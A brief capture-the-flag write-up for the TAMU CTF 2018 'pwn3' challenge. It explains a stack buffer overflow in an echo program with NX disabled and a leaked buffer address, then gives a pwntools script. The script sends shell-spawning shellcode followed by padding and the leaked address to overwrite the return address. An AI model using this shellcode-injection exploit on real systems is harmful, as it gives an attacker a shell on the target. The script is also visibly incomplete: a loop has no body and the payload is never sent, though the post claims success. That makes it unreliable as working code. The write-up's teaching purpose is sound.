TAMU CTF 2018 - PWN3

tags: ctf springchicken challenge
by zangobot

pwn3 is the natural evolution of pwn2:

Welcome to the New Echo application 2.0!
- Less deprecated flag printing functions!
- New Random Number Generator!

Your random number 0xffc9967a!
Now what should I echo? springchicken_is_ok

Again, no canary and for the first time, NX disabled (this is nice).

BUT ASLR is enabled! There is no print_flag function… man this is though.

Or maybe not? NX is disabled, so I can put a shellcraft into the stack and execute it.

But how can I reference it? Just look at the output of radare2.

The address printed at the beginning is the address of the input string.


from pwn import *

OFFSET = 242 #found using ragg2

rem = remote('pwn.ctf.tamu.edu', 4323)

#read useless line
for i in range(0,5):

#this is the address line
to_grep = rem.recvline()

#this is the address
address = '0x'+to_grep[::-1][2:10][::-1]
address = p32(int(address,16))

shellcode = asm(shellcraft.i386.sh())
exploit = shellcode + 'A'*(OFFSET - len(shellcode)) + address


Flag captured <.<